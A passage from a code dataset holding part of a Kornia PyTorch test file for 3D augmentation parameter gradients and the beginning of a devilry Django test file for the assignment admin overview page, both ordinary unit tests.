# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.translate._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (translate.to(device=device, dtype=dtype) - aug.translate.data).sum() == 0
else:
assert (translate.to(device=device, dtype=dtype) - aug.translate.data).sum() != 0
if not isinstance(scale, (int, float, list, tuple)):
assert isinstance(aug.scale, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.scale.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.scale._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (scale.to(device=device, dtype=dtype) - aug.scale.data).sum() == 0
else:
assert (scale.to(device=device, dtype=dtype) - aug.scale.data).sum() != 0
if not isinstance(shear, (int, float, list, tuple)):
assert isinstance(aug.shears, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.shears.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.shears._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (shear.to(device=device, dtype=dtype) - aug.shears.data).sum() == 0
else:
assert (shear.to(device=device, dtype=dtype) - aug.shears.data).sum() != 0
class TestRandomRotation3DBackward:
@pytest.mark.parametrize(
"degrees",
[
10,
[10.0, 20.0],
[10.0, 20.0, 30.0],
[(10, 20), (10, 20), (10, 20)],
torch.tensor(10.0),
torch.tensor([10.0, 20.0]),
torch.tensor([10, 20, 30]),
torch.tensor([(10, 20), (10, 20), (10, 20)]),
],
)
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("align_corners", [True, False])
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(self, degrees, resample, align_corners, return_transform, same_on_batch, device, dtype):
_degrees = (
degrees
if isinstance(degrees, (int, float, list, tuple))
else nn.Parameter(degrees.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomRotation3D(
_degrees,
resample,
align_corners=align_corners,
return_transform=return_transform,
same_on_batch=same_on_batch,
p=1.0,
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(degrees, (int, float, list, tuple)):
assert isinstance(aug.degrees, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.degrees.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.degrees._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() == 0
else:
assert (degrees.to(device=device, dtype=dtype) - aug.degrees.data).sum() != 0
class TestRandomPerspective3DBackward:
@pytest.mark.parametrize("distortion_scale", [0.5, torch.tensor(0.5)])
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("align_corners", [True, False])
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(self, distortion_scale, resample, align_corners, return_transform, same_on_batch, device, dtype):
_distortion_scale = (
distortion_scale
if isinstance(distortion_scale, (float, int))
else nn.Parameter(distortion_scale.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomPerspective3D(
_distortion_scale,
resample=resample,
return_transform=return_transform,
same_on_batch=same_on_batch,
align_corners=align_corners,
p=1.0,
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(distortion_scale, (float, int)):
assert isinstance(aug.distortion_scale, torch.Tensor)
# Assert if param not updated
if resample == 'nearest' and aug.distortion_scale.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.distortion_scale._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (distortion_scale.to(device=device, dtype=dtype) - aug.distortion_scale.data).sum() == 0
else:
assert (distortion_scale.to(device=device, dtype=dtype) - aug.distortion_scale.data).sum() != 0
class TestRandomMotionBlur3DBackward:
@pytest.mark.parametrize("angle", [20.0, torch.tensor(20.0), torch.tensor([20.0])])
@pytest.mark.parametrize("direction", [[-0.5, 0.5], torch.tensor([-0.5, 0.5])])
# 'reflect' is not implemented by torch.
@pytest.mark.parametrize("border_type", ['constant', 'replicate', 'circular'])
@pytest.mark.parametrize("resample", ['bilinear']) # TODO: Ignore nearest for now.
@pytest.mark.parametrize("return_transform", [True, False])
@pytest.mark.parametrize("same_on_batch", [True, False])
def test_param(self, angle, direction, border_type, resample, return_transform, same_on_batch, device, dtype):
_angle = (
angle
if isinstance(angle, (float, int, list, tuple))
else nn.Parameter(angle.clone().to(device=device, dtype=dtype))
)
_direction = (
direction
if isinstance(direction, (list, tuple))
else nn.Parameter(direction.clone().to(device=device, dtype=dtype))
)
torch.manual_seed(0)
input = torch.randint(255, (2, 3, 10, 10, 10), device=device, dtype=dtype) / 255.0
aug = RandomMotionBlur3D(
(3, 3), _angle, _direction, border_type, resample, return_transform, same_on_batch, p=1.0
)
if return_transform:
output, _ = aug(input)
else:
output = aug(input)
if len(list(aug.parameters())) != 0:
mse = nn.MSELoss()
opt = torch.optim.SGD(aug.parameters(), lr=10)
loss = mse(output, torch.ones_like(output) * 2) # to ensure that a big loss value could be obtained
loss.backward()
opt.step()
if not isinstance(angle, (float, int, list, tuple)):
assert isinstance(aug.angle, torch.Tensor)
if resample == 'nearest' and aug.angle.is_cuda:
# grid_sample in nearest mode and cuda device returns nan than 0
pass
elif resample == 'nearest' or torch.all(aug.angle._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (angle.to(device=device, dtype=dtype) - aug.angle.data).sum() == 0
else:
# Assert if param not updated
assert (angle.to(device=device, dtype=dtype) - aug.angle.data).sum() != 0
if not isinstance(direction, (list, tuple)):
assert isinstance(aug.direction, torch.Tensor)
if torch.all(aug.direction._grad == 0.0):
# grid_sample will return grad = 0 for resample nearest
# https://discuss.pytorch.org/t/autograd-issue-with-f-grid-sample/76894
assert (direction.to(device=device, dtype=dtype) - aug.direction.data).sum() == 0
else:
# Assert if param not updated
assert (direction.to(device=device, dtype=dtype) - aug.direction.data).sum() != 0
| 44.490741 | 119 | 0.568574 | 1,768 | 14,415 | 4.555995 | 0.07862 | 0.013408 | 0.059094 | 0.076474 | 0.872998 | 0.848417 | 0.807325 | 0.768219 | 0.768219 | 0.768219 | 0 | 0.048411 | 0.299272 | 14,415 | 323 | 120 | 44.628483 | 0.749035 | 0.139785 | 0 | 0.538168 | 0 | 0 | 0.03366 | 0 | 0 | 0 | 0 | 0.003096 | 0.091603 | 1 | 0.015267 | false | 0.026718 | 0.015267 | 0 | 0.045802 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
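# All four test classes above follow one pattern: wrap an augmentation hyper-parameter in
# nn.Parameter, push an MSE loss backwards, take a single SGD step, and assert the parameter
# moved. The standalone sketch below shows that pattern with a plain differentiable scaling
# op instead of a Kornia augmentation, so it makes no claims about Kornia internals.
import torch
import torch.nn as nn

torch.manual_seed(0)

# a learnable "gain" standing in for an augmentation hyper-parameter
gain = nn.Parameter(torch.tensor(0.5))
x = torch.rand(2, 3, 8, 8)

output = x * gain  # differentiable with respect to gain
loss = nn.MSELoss()(output, torch.ones_like(output) * 2)

opt = torch.optim.SGD([gain], lr=10)
loss.backward()
opt.step()

# the parameter must have been updated away from its initial value
assert (torch.tensor(0.5) - gain.data).abs().sum() != 0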
7284770cd247df113056a7b89d2f67382307ca4a | 35,461 | py | Python | devilry/devilry_admin/tests/assignment/test_overview.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_admin/tests/assignment/test_overview.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_admin/tests/assignment/test_overview.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z | import unittest
from datetime import timedelta
import mock
from django.conf import settings
from django.test import TestCase
from django.utils import timezone
from cradmin_legacy import cradmin_testhelpers
from cradmin_legacy.crinstance import reverse_cradmin_url
from model_bakery import baker
from devilry.apps.core import devilry_core_baker_factories as core_baker
from devilry.apps.core.models import Assignment
from devilry.devilry_account.models import PermissionGroup
from devilry.devilry_admin.views.assignment import overview
from devilry.utils.datetimeutils import default_timezone_datetime
class TestOverviewApp(TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = overview.Overview
def test_title(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end',
short_name="testassignment",
parentnode__short_name="testperiod", # Period
parentnode__parentnode__short_name="testsubject" # Subject
)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(mockresponse.selector.one('title').alltext_normalized,
'testsubject.testperiod.testassignment')
def test_devilry_admin_assignment_edit_long_name(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(mockresponse.selector.one('#devilry_admin_assignment_edit_long_name').alltext_normalized,
'Edit name')
def test_h1(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end', long_name="TESTASSIGNMENT")
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(mockresponse.selector.one('h1').alltext_normalized, 'TESTASSIGNMENT')
# Todo: Remove
# def test_publish_now_info_box(self):
# assignment = baker.make('core.Assignment', publishing_time=timezone.now() + timedelta(days=1))
# group = baker.make('core.AssignmentGroup', parentnode=assignment)
# core_baker.candidate(group=group)
# core_baker.examiner(group=group)
# baker.make('core.RelatedStudent', period=assignment.period)
# baker.make('core.RelatedExaminer', period=assignment.period)
# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertIn(
# 'Ready to publish the assignment',
# mockresponse.selector.one('#devilry_admin_assignment_overview_info_box').alltext_normalized
# )
# self.assertEqual(
# mock.call(appname='overview', args=(assignment.id, ), kwargs={}, viewname='publish_assignment_now'),
# mockresponse.request.cradmin_instance.reverse_url.call_args_list[0]
# )
# self.assertTrue(mockresponse.selector.exists('#devilry_admin_assignment_published_publishnow_form_info_box'))
def test_published_row(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(2000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#devilry_admin_assignment_overview_published h3').alltext_normalized,
"Was published: Jan 1 2000, 00:00")
def test_published_row_published_time_in_future(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(3000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#devilry_admin_assignment_overview_published h3').alltext_normalized,
"Will be published: Jan 1 3000, 00:00")
def test_published_row_buttons(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(3000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_published_publishnow_form input[type="submit"]')['value'],
'Publish now'
)
self.assertEqual(
mockresponse.selector.one(
"#devilry_admin_assignment_published_buttonrow a").alltext_normalized,
'Edit publishing time'
)
def test_published_row_buttons_when_already_published(self):
assignment = baker.make('core.Assignment', publishing_time=default_timezone_datetime(2000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertFalse(
mockresponse.selector.exists(
"#devilry_admin_assignment_published_publishnow_form")
)
def test_settings_row_first_deadline(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_first_deadline a').alltext_normalized,
"Edit first deadline")
def test_settings_row_first_deadline_description(self):
assignment = baker.make('core.Assignment', first_deadline=default_timezone_datetime(2000, 1, 1))
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_first_deadline p').alltext_normalized,
"The first deadline is Saturday January 1, 2000, 00:00. This deadline is common for all "
"students unless a new deadline have been provided to a group.")
def test_settings_row_anonymization(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization a').alltext_normalized,
"Edit anonymization mode")
def test_settings_row_anonymization_description_when_anonymizationmode_off(self):
assignment = baker.make('core.Assignment')
# default = ANONYMIZATIONMODE_OFF
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization p').alltext_normalized,
Assignment.ANONYMIZATIONMODE_CHOICES_DICT.get(Assignment.ANONYMIZATIONMODE_OFF))
def test_settings_row_anonymization_description_when_anonymizationmode_semi_anonymous(self):
assignment = baker.make('core.Assignment', anonymizationmode=Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization p').alltext_normalized,
Assignment.ANONYMIZATIONMODE_CHOICES_DICT.get(Assignment.ANONYMIZATIONMODE_SEMI_ANONYMOUS)
)
def test_settings_row_anonymization_description_when_anonymizationmode_fully_anonymous(self):
assignment = baker.make('core.Assignment', anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_settings_anonymization p').alltext_normalized,
Assignment.ANONYMIZATIONMODE_CHOICES_DICT.get(Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
)
def test_gradingconfiguration_row_heading(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_gradingconfiguration h2').alltext_normalized,
"Grading configuration")
# def test_gradingconfiguration_row_information_table_caption(self):
# assignment = baker.make('core.Assignment')
# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertEqual(
# mockresponse.selector.one(
# '#devilry_admin_assignment_overview_gradingconfiguration_information table caption').alltext_normalized,
# "Current setup")
# def test_gradingconfiguration_row_information_table_head(self):
# assignment = baker.make('core.Assignment')
# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertEqual(
# mockresponse.selector.one(
# '#devilry_admin_assignment_overview_gradingconfiguration_information table thead').alltext_normalized,
# "Description Grading")
def test_gradingconfiguration_examiner_chooses(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(1)').alltext_normalized,
'Examiner chooses')
def test_gradingconfiguration_examiner_chooses_passed_failed(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(2)').alltext_normalized,
str(Assignment.GRADING_SYSTEM_PLUGIN_ID_CHOICES_DICT.get(
Assignment.GRADING_SYSTEM_PLUGIN_ID_PASSEDFAILED)))
def test_gradingconfiguration_examiner_chooses_points(self):
assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(2)').alltext_normalized,
str(Assignment.GRADING_SYSTEM_PLUGIN_ID_CHOICES_DICT.get(
Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)))
# def test_gradingconfiguration_examiner_chooses_schema(self):
# assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_SCHEMA)
# mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# self.assertEqual(
# mockresponse.selector.one(
# '#devilry_admin_assignment_overview_gradingconfiguration_information '
# 'table tbody tr:nth-child(1) td:nth-child(2)').alltext_normalized,
# str(Assignment.GRADING_SYSTEM_PLUGIN_ID_CHOICES_DICT.get(
# Assignment.GRADING_SYSTEM_PLUGIN_ID_SCHEMA)))
def test_gradingconfiguration_students_see(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(3)').alltext_normalized,
"Students see")
def test_gradingconfiguration_students_see_passed_failed(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(4)').alltext_normalized,
str(Assignment.POINTS_TO_GRADE_MAPPER_CHOICES_DICT.get(
Assignment.POINTS_TO_GRADE_MAPPER_PASSED_FAILED)))
def test_gradingconfiguration_students_see_points(self):
assignment = baker.make('core.Assignment', points_to_grade_mapper=Assignment.POINTS_TO_GRADE_MAPPER_RAW_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(4)').alltext_normalized,
str(Assignment.POINTS_TO_GRADE_MAPPER_CHOICES_DICT.get(
Assignment.POINTS_TO_GRADE_MAPPER_RAW_POINTS)))
def test_gradingconfiguration_students_see_schema(self):
assignment = baker.make('core.Assignment',
points_to_grade_mapper=Assignment.POINTS_TO_GRADE_MAPPER_CUSTOM_TABLE)
point_to_grade_map = baker.make('core.PointToGradeMap', assignment=assignment)
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=5,
maximum_points=9, grade='F')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=10,
maximum_points=14, grade='E')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=15,
maximum_points=19, grade='D')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=20,
maximum_points=24, grade='C')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=25,
maximum_points=29, grade='B')
baker.make('core.PointRangeToGrade', point_to_grade_map=point_to_grade_map, minimum_points=30,
maximum_points=35, grade='A')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(4)').alltext_normalized,
'F, E, D, C, B or A')
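# Plain-Python illustration (not devilry's PointToGradeMap implementation) of how the
# point ranges built in the test above map points to grades and how a summary string
# such as 'F, E, D, C, B or A' can be derived from them. All names are example-only.
def _point_to_grade_sketch():
    ranges = [(5, 9, 'F'), (10, 14, 'E'), (15, 19, 'D'),
              (20, 24, 'C'), (25, 29, 'B'), (30, 35, 'A')]

    def grade_for(points):
        for minimum, maximum, grade in ranges:
            if minimum <= points <= maximum:
                return grade
        return None

    summary = ', '.join(grade for _, _, grade in ranges[:-1]) + ' or ' + ranges[-1][2]
    assert summary == 'F, E, D, C, B or A'
    assert grade_for(12) == 'E'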
def test_gradingconfiguration_max_points(self):
assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(5)').alltext_normalized,
"Maximum number of points achievable")
def test_gradingconfiguration_max_points_100(self):
assignment = baker.make('core.Assignment', max_points=100,
grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(6)').alltext_normalized,
"100")
def test_gradingconfiguration_min_points(self):
assignment = baker.make('core.Assignment', grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dt:nth-child(7)').alltext_normalized,
"Minimum number of points required to pass")
def test_gradingconfiguration_min_points_0(self):
assignment = baker.make('core.Assignment', passing_grade_min_points=0,
grading_system_plugin_id=Assignment.GRADING_SYSTEM_PLUGIN_ID_POINTS)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_gradingconfiguration_information '
'dl:nth-child(1) dd:nth-child(8)').alltext_normalized,
"0")
def test_utilities_row_passed_previous(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_utilities_passed_previous h3').alltext_normalized,
"Passed previous semester")
def test_utilities_row_passed_previous_description(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_utilities_passed_previous p').alltext_normalized,
"Mark students that have passed this assignment previously.")
def test_utilities_button_passed_previous_period_text(self):
assignment = baker.make('core.Assignment')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one(
'#devilry_admin_assignment_overview_utilities_passed_previous_buttons'
).alltext_normalized,
'Edit passed previous semester'
)
class TestOverviewExaminerSection(TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = overview.Overview
def test_sanity_no_relatedexaminer_no_other_warnings_shown(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_empty_semester_warning'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
def test_sanity_students_without_examiners_and_no_examiners(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.parentnode)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_empty_semester_warning'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
def test_sanity_students_without_examiners_and_more_relatedexaminer_than_examiners(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.parentnode)
related_examiner = baker.make('core.RelatedExaminer', period=assignment.parentnode)
baker.make('core.Examiner', relatedexaminer=related_examiner, assignmentgroup__parentnode=assignment)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Warnings rendered
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
self.assertTrue(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_on_semester_not_on_assignment'))
# Warnings not rendered
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_empty_semester_warning'))
self.assertFalse(mockresponse.selector.exists(
'#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
def test_assignment_meta_one_distinct_examiner_configured(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
relatedexaminer = baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Examiner', relatedexaminer=relatedexaminer, assignmentgroup__parentnode=assignment)
baker.make('core.Examiner', relatedexaminer=relatedexaminer, assignmentgroup__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('.devilry-admin-assignment-examiners-exists').alltext_normalized,
'1 examiner(s) configured')
def test_assignment_meta_multiple_examiners_configured(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.Examiner', assignmentgroup__parentnode=assignment)
baker.make('core.Examiner', assignmentgroup__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('#id_devilry_admin_assignment_examiners_meta_count_text').alltext_normalized,
'2 examiner(s) configured')
def test_assignment_meta_no_examiner_configured(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
self.assertEqual(
mockresponse.selector.one('.devilry-admin-assignment-examiners-does-not-exist').alltext_normalized,
'No examiners configured')
def test_no_examiners_on_semester_warning(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_empty_semester_warning'))
# Check warning text
self.assertIn(
'warning: Go to the semester page and add/activate examiners',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_empty_semester_warning')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_periodadmin',
appname='overview',
roleid=assignment.parentnode.id,
viewname='INDEX'
)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_empty_semester_warning > strong > a').get('href'))
def test_students_without_examiners_exists_warning(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_students_without_examiner_warning'))
# Check warning text
self.assertIn(
'warning: There are students with no examiners assigned to them',
mockresponse.selector.one('#id_devilry_admin_assignment_examiner_students_without_examiner_warning')
.alltext_normalized)
# Check warning link
url = reverse_cradmin_url(
instanceid='devilry_admin_assignmentadmin',
appname='examineroverview',
roleid=assignment.id,
viewname='INDEX'
)
self.assertEqual(
url,
mockresponse.selector.one(
'#id_devilry_admin_assignment_examiner_students_without_examiner_warning > strong > a').get('href'))
def test_no_examiners_configured_for_assignment_groups_warning(self):
assignment = baker.make_recipe('devilry.apps.core.assignment_activeperiod_end')
baker.make('core.RelatedExaminer', period=assignment.period)
baker.make('core.Candidate', assignment_group__parentnode=assignment)
mockresponse = self.mock_http200_getrequest_htmls(cradmin_role=assignment)
# Check warning exists
self.assertTrue(
mockresponse.selector.exists('#id_devilry_admin_assignment_examiner_no_examiners_on_assignment'))
# Check warning texts
self.assertIn(
